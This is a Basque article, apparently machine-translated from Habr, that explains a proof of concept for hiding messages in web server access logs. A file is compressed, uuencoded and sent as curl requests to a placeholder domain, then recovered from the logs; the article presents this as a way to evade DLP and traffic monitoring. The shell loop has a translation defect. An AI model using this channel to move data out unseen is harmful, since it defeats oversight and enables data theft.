Mezu sekretuen trukea zerbitzariaren erregistroen bidez

Wikipediaren definizioaren arabera, tanta hila kokapen sekretua erabiltzen duten pertsonen artean informazioa edo elementu batzuk trukatzeko balio duen konspirazio tresna da. Ideia da jendea ez dela inoiz elkartzen, baina hala ere informazioa trukatzen dute segurtasun operatiboa mantentzeko.

Ezkutalekuak ez luke arreta erakarri behar. Hori dela eta, lineaz kanpoko munduan gauza diskretuak erabiltzen dituzte maiz: horman adreilu solte bat, liburutegiko liburu bat edo zuhaitz bateko zulo bat.

Interneten zifratze- eta anonimatu-tresna asko daude, baina tresna horiek erabiltzeak berak erakartzen du arreta. Horrez gain, enpresa edo gobernu mailan blokeatu daitezke. Zer egin?

Ryan Flowers garatzaileak aukera interesgarri bat proposatu zuen - erabili edozein web zerbitzari ezkutaleku gisa. Pentsatzen baduzu, zer egiten du web zerbitzari batek? Eskaerak jasotzen ditu, fitxategiak igortzen ditu eta erregistroak idazten ditu. Eta eskaera guztiak erregistratzen ditu, okerrak ere bai!

Bihurtzen da edozein web zerbitzariak erregistroan ia edozein mezu gordetzeko aukera ematen duela. Loreek hau nola erabili galdetu zuten.

Aukera hau eskaintzen du:

  1. Hartu testu-fitxategi bat (mezu sekretua) eta kalkulatu hash (md5sum).
  2. Kodetzen dugu (gzip+uuencode).
  3. Erregistrora zerbitzariari nahita okerra den eskaera erabiliz idazten dugu.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Fitxategi bat irakurtzeko, eragiketa hauek alderantzizko ordenan egin behar dituzu: fitxategia deskodetu eta deskonprimitu, hash-a egiaztatu (hash-a modu seguruan transmititu daiteke kanal irekietan).

Espazioak ordezkatzen dira =+=helbidean tarterik ez egon dadin. Egileak CurlyTP deitzen duen programak base64 kodeketa erabiltzen du, posta elektronikoko eranskinak bezala. Eskaera gako-hitz batekin egiten da ?transfer?hartzaileak erraz aurki dezan erregistroetan.

Zer ikusten dugu kasu honetan erregistroetan?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Esan bezala, mezu sekretu bat jasotzeko eragiketak alderantzizko ordenan egin behar dituzu:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Prozesua automatizatzeko erraza da. Md5sum bat dator, eta fitxategiaren edukiak dena ondo deskodetu dela baieztatzen du.

Metodoa oso erraza da. "Ariketa honen helburua fitxategiak web eskaera txiki errugabeen bidez transferi daitezkeela frogatzea da, eta testu arrunteko erregistroak dituen edozein web zerbitzaritan funtzionatzen duela. Funtsean, web zerbitzari bakoitza ezkutaleku bat da!” idazten du Flowers-ek.

Jakina, metodoak hartzaileak zerbitzariaren erregistroetarako sarbidea badu soilik funtzionatzen du. Baina sarbide hori, adibidez, ostalari askok ematen dute.

Nola erabili?

Ryan Flowersek dio ez dela informazioaren segurtasunean aditua eta ez duela CurlyTPren erabilpen posibleen zerrenda osatuko. Berarentzat, egunero ikusten ditugun tresna ezagunak modu ez-konbentzionalean erabil daitezkeela kontzeptuaren froga bat besterik ez da.

Izan ere, metodo honek abantaila ugari ditu beste zerbitzarien "ezkutatuak" bezalako beste aldean Dead Drop digitala edo PirateBox: ez du zerbitzariaren aldetik konfigurazio berezirik behar edo protokolo berezirik - eta ez du susmorik piztuko trafikoa kontrolatzen dutenen artean. Litekeena da SORM edo DLP sistema batek testu-fitxategi konprimituak bilatzeko URLak eskaneatzea.

Hau da zerbitzu fitxategien bidez mezuak transmititzeko moduetako bat. Konpainia aurreratu batzuk nola kokatzen ziren gogoratu dezakezu Garatzaile-lanak HTTP goiburuetan edo HTML orrien kodean.

Mezu sekretuen trukea zerbitzariaren erregistroen bidez

Ideia zen web garatzaileek bakarrik ikusiko zutela Pazko arrautza hau, pertsona arrunt batek ez baitzituen goiburuak edo HTML kodea begiratuko.

Mezu sekretuen trukea zerbitzariaren erregistroen bidez

Iturria: www.habr.com

Gehitu iruzkin berria